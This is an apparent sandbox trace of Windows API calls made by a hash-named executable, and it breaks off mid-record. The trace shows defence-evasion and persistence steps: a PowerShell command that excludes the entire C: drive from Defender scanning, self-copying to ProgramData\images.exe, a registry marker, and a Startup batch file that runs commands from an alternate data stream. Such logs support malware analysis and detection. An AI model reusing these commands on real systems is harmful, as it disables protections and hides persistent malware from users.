1 [0132.310] GetCurrentProcess () returned 0xffffffff [0132.310] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2daf8c4 | out: TokenHandle=0x2daf8c4*=0x2c4) returned 1 [0132.310] GetTokenInformation (in: TokenHandle=0x2c4, TokenInformationClass=0x14, TokenInformation=0x2daf8bc, TokenInformationLength=0x4, ReturnLength=0x2daf8c0 | out: TokenInformation=0x2daf8bc, ReturnLength=0x2daf8c0) returned 1 [0132.310] CloseHandle (hObject=0x2c4) returned 1 [0132.310] GetCurrentProcess () returned 0xffffffff [0132.310] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2daf8c4 | out: TokenHandle=0x2daf8c4*=0x2c4) returned 1 [0132.310] GetTokenInformation (in: TokenHandle=0x2c4, TokenInformationClass=0x14, TokenInformation=0x2daf8bc, TokenInformationLength=0x4, ReturnLength=0x2daf8c0 | out: TokenInformation=0x2daf8bc, ReturnLength=0x2daf8c0) returned 1 [0132.310] CloseHandle (hObject=0x2c4) returned 1 [0132.310] GetProcessHeap () returned 0x7c0000 [0132.310] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x100) returned 0x7f2f68 [0132.310] GetProcessHeap () returned 0x7c0000 [0132.311] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x100) returned 0x7f3070 [0132.311] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x7f2f68, nSize=0x100 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe")) returned 0x62 [0132.313] WinExec (lpCmdLine="powershell Add-MpPreference -ExclusionPath C:\\", uCmdShow=0x0) returned 0x21 [0132.723] GetProcessHeap () returned 0x7c0000 [0132.723] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x7d0) returned 0x7e7f10 [0132.723] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7e7f10, nSize=0x3e8 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe")) returned 0x62 [0132.723] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe") returned 98 [0132.723] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0132.724] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe") returned 98 [0132.724] lstrcpyW (in: lpString1=0x3730000, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" [0132.724] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe") returned 98 [0132.724] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x3740000 [0132.724] lstrcpyW (in: lpString1=0x3740000, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" [0132.724] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.725] GetProcessHeap () returned 0x7c0000 [0132.726] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7f10 | out: hHeap=0x7c0000) returned 1 [0132.726] GetProcessHeap () returned 0x7c0000 [0132.726] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0xa) returned 0x7e37c0 [0132.726] lstrlenA (lpString="BogHpupvd") returned 9 [0132.726] lstrlenA (lpString="BogHpupvd") returned 9 [0132.726] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0132.727] lstrcpyA (in: lpString1=0x3730000, lpString2="BogHpupvd" | out: lpString1="BogHpupvd") returned="BogHpupvd" [0132.727] lstrlenA (lpString="BogHpupvd") returned 9 [0132.727] lstrlenA (lpString="BogHpupvd") returned 9 [0132.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x3730000, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0132.727] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3750000 [0132.728] lstrlenA (lpString="BogHpupvd") returned 9 [0132.728] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3730000, cbMultiByte=-1, lpWideCharStr=0x3750000, cchWideChar=22 | out: lpWideCharStr="BogHpupvd") returned 10 [0132.728] lstrlenW (lpString="BogHpupvd") returned 9 [0132.728] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0132.729] lstrlenW (lpString="BogHpupvd") returned 9 [0132.733] lstrcpyW (in: lpString1=0x3760000, lpString2="BogHpupvd" | out: lpString1="BogHpupvd") returned="BogHpupvd" [0132.733] lstrlenW (lpString="BogHpupvd") returned 9 [0132.733] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0132.734] lstrcpyW (in: lpString1=0x3770000, lpString2="BogHpupvd" | out: lpString1="BogHpupvd") returned="BogHpupvd" [0132.734] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.735] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.736] lstrlenW (lpString="BogHpupvd") returned 9 [0132.736] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3750000 [0132.736] lstrcatW (in: lpString1="", lpString2="BogHpupvd" | out: lpString1="BogHpupvd") returned="BogHpupvd" [0132.737] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.738] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.741] GetProcessHeap () returned 0x7c0000 [0132.741] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e37c0 | out: hHeap=0x7c0000) returned 1 [0132.741] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS", Reserved=0x0, lpClass=0x0, dwOptions=0x1, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x2daf950, lpdwDisposition=0x2daf864 | out: phkResult=0x2daf950*=0x2c4, lpdwDisposition=0x2daf864*=0x1) returned 0x0 [0132.742] RegCloseKey (hKey=0x2c4) returned 0x0 [0132.742] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2daf670, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0132.743] lstrlenW (lpString="C:\\ProgramData") returned 14 [0132.743] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0132.744] lstrlenW (lpString="C:\\ProgramData") returned 14 [0132.744] lstrcpyW (in: lpString1=0x3730000, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0132.744] lstrlenW (lpString="C:\\ProgramData") returned 14 [0132.744] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0132.744] lstrcpyW (in: lpString1=0x3760000, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0132.744] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.745] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\ProgramData" (normalized: "c:\\programdata"), psa=0x0) returned 183 [0132.745] lstrlenW (lpString="images.exe") returned 10 [0132.745] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0132.746] lstrcpyW (in: lpString1=0x3730000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0132.746] lstrlenW (lpString="\\") returned 1 [0132.746] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0132.746] lstrlenW (lpString="\\") returned 1 [0132.746] lstrcpyW (in: lpString1=0x3770000, lpString2="\\" | out: lpString1="\\") returned="\\" [0132.746] lstrlenW (lpString="\\") returned 1 [0132.746] lstrlenW (lpString="C:\\ProgramData") returned 14 [0132.746] VirtualQuery (in: lpAddress=0x3760000, lpBuffer=0x2daf81c, dwLength=0x1c | out: lpBuffer=0x2daf81c*(BaseAddress=0x3760000, AllocationBase=0x3760000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.746] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0132.746] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.747] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0132.747] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.749] lstrlenW (lpString="images.exe") returned 10 [0132.749] lstrlenW (lpString="C:\\ProgramData\\") returned 15 [0132.749] VirtualQuery (in: lpAddress=0x3780000, lpBuffer=0x2daf82c, dwLength=0x1c | out: lpBuffer=0x2daf82c*(BaseAddress=0x3780000, AllocationBase=0x3780000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.749] VirtualAlloc (lpAddress=0x0, dwSize=0x36, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0132.750] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.751] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0132.751] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.753] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe"), lpNewFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), bFailIfExists=0) returned 1 [0134.351] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0134.351] GetProcessHeap () returned 0x7c0000 [0134.351] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x34) returned 0x7d58e8 [0134.351] GetProcessHeap () returned 0x7c0000 [0134.351] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7e8100 [0134.351] GetProcessHeap () returned 0x7c0000 [0134.351] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x34) returned 0x7e8140 [0134.351] GetProcessHeap () returned 0x7c0000 [0134.351] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x34) returned 0x7e8280 [0134.351] GetProcessHeap () returned 0x7c0000 [0134.352] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e8140 | out: hHeap=0x7c0000) returned 1 [0134.352] GetProcessHeap () returned 0x7c0000 [0134.352] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e8100 | out: hHeap=0x7c0000) returned 1 [0134.352] GetProcessHeap () returned 0x7c0000 [0134.352] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d58e8 | out: hHeap=0x7c0000) returned 1 [0134.352] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2daf950 | out: phkResult=0x2daf950*=0x2c4) returned 0x0 [0134.353] RegSetValueExW (in: hKey=0x2c4, lpValueName="inst", Reserved=0x0, dwType=0x3, lpData=0x7e8280*, cbData=0x34 | out: lpData=0x7e8280*) returned 0x0 [0134.353] GetProcessHeap () returned 0x7c0000 [0134.353] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e8280 | out: hHeap=0x7c0000) returned 1 [0134.354] SHGetKnownFolderPath (in: rfid=0x2b64550, param_2=0x0, hToken=0x0, ppszPath=0x2daf8a4 | out: ppszPath=0x2daf8a4*="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0134.355] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 83 [0134.355] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.356] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 83 [0134.356] lstrcpyW (in: lpString1=0x3730000, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0134.356] lstrlenW (lpString="\\programs.bat") returned 13 [0134.356] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.356] lstrlenW (lpString="\\programs.bat") returned 13 [0134.357] lstrcpyW (in: lpString1=0x3770000, lpString2="\\programs.bat" | out: lpString1="\\programs.bat") returned="\\programs.bat" [0134.357] lstrlenW (lpString="\\programs.bat") returned 13 [0134.357] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 83 [0134.357] VirtualQuery (in: lpAddress=0x3730000, lpBuffer=0x2daf81c, dwLength=0x1c | out: lpBuffer=0x2daf81c*(BaseAddress=0x3730000, AllocationBase=0x3730000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.357] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0134.357] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.358] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpString2="\\programs.bat" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" [0134.358] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.358] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"") returned 36 [0134.358] VirtualAlloc (lpAddress=0x0, dwSize=0x4a, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.359] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"") returned 36 [0134.359] lstrcpyW (in: lpString1=0x3730000, lpString2="for /F \"usebackq tokens=*\" %%A in (\"" | out: lpString1="for /F \"usebackq tokens=*\" %%A in (\"") returned="for /F \"usebackq tokens=*\" %%A in (\"" [0134.359] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.359] VirtualAlloc (lpAddress=0x0, dwSize=0xc2, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.359] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.359] lstrcpyW (in: lpString1=0x3770000, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" [0134.359] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.359] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"") returned 36 [0134.359] VirtualQuery (in: lpAddress=0x3730000, lpBuffer=0x2daf814, dwLength=0x1c | out: lpBuffer=0x2daf814*(BaseAddress=0x3730000, AllocationBase=0x3730000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.359] VirtualAlloc (lpAddress=0x0, dwSize=0x10c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0134.360] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.360] lstrcatW (in: lpString1="for /F \"usebackq tokens=*\" %%A in (\"", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" | out: lpString1="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" [0134.361] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.361] lstrlenW (lpString=":start") returned 6 [0134.361] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.362] lstrlenW (lpString=":start") returned 6 [0134.362] lstrcpyW (in: lpString1=0x3730000, lpString2=":start" | out: lpString1=":start") returned=":start" [0134.362] lstrlenW (lpString=":start") returned 6 [0134.362] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 132 [0134.362] VirtualQuery (in: lpAddress=0x3790000, lpBuffer=0x2daf818, dwLength=0x1c | out: lpBuffer=0x2daf818*(BaseAddress=0x3790000, AllocationBase=0x3790000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.362] VirtualAlloc (lpAddress=0x0, dwSize=0x118, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.362] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.363] lstrcatW (in: lpString1="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat", lpString2=":start" | out: lpString1="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start" [0134.363] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.364] lstrlenW (lpString="\") do %%A") returned 9 [0134.364] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.364] lstrlenW (lpString="\") do %%A") returned 9 [0134.364] lstrcpyW (in: lpString1=0x3730000, lpString2="\") do %%A" | out: lpString1="\") do %%A") returned="\") do %%A" [0134.364] lstrlenW (lpString="\") do %%A") returned 9 [0134.364] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned 138 [0134.364] VirtualQuery (in: lpAddress=0x3770000, lpBuffer=0x2daf81c, dwLength=0x1c | out: lpBuffer=0x2daf81c*(BaseAddress=0x3770000, AllocationBase=0x3770000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.364] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0134.365] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.470] lstrcatW (in: lpString1="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start", lpString2="\") do %%A" | out: lpString1="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A" [0134.470] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.471] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.472] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned 147 [0134.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A", cchWideChar=147, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 147 [0134.474] VirtualAlloc (lpAddress=0x0, dwSize=0x93, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.474] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned 147 [0134.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A", cchWideChar=147, lpMultiByteStr=0x3770000, cbMultiByte=147, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A", lpUsedDefaultChar=0x0) returned 147 [0134.475] lstrlenA (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned 147 [0134.475] lstrlenA (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned 147 [0134.475] VirtualAlloc (lpAddress=0x0, dwSize=0x93, flAllocationType=0x3000, flProtect=0x4) returned 0x37a0000 [0134.475] lstrcpyA (in: lpString1=0x37a0000, lpString2="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A" | out: lpString1="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A" [0134.475] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.476] lstrlenA (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned 147 [0134.476] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.477] lstrcatA (in: lpString1="", lpString2="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A" | out: lpString1="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A" [0134.477] VirtualFree (lpAddress=0x37a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.477] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.478] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.478] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0134.478] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x37a0000 [0134.479] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat", cchWideChar=96, lpMultiByteStr=0x37a0000, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 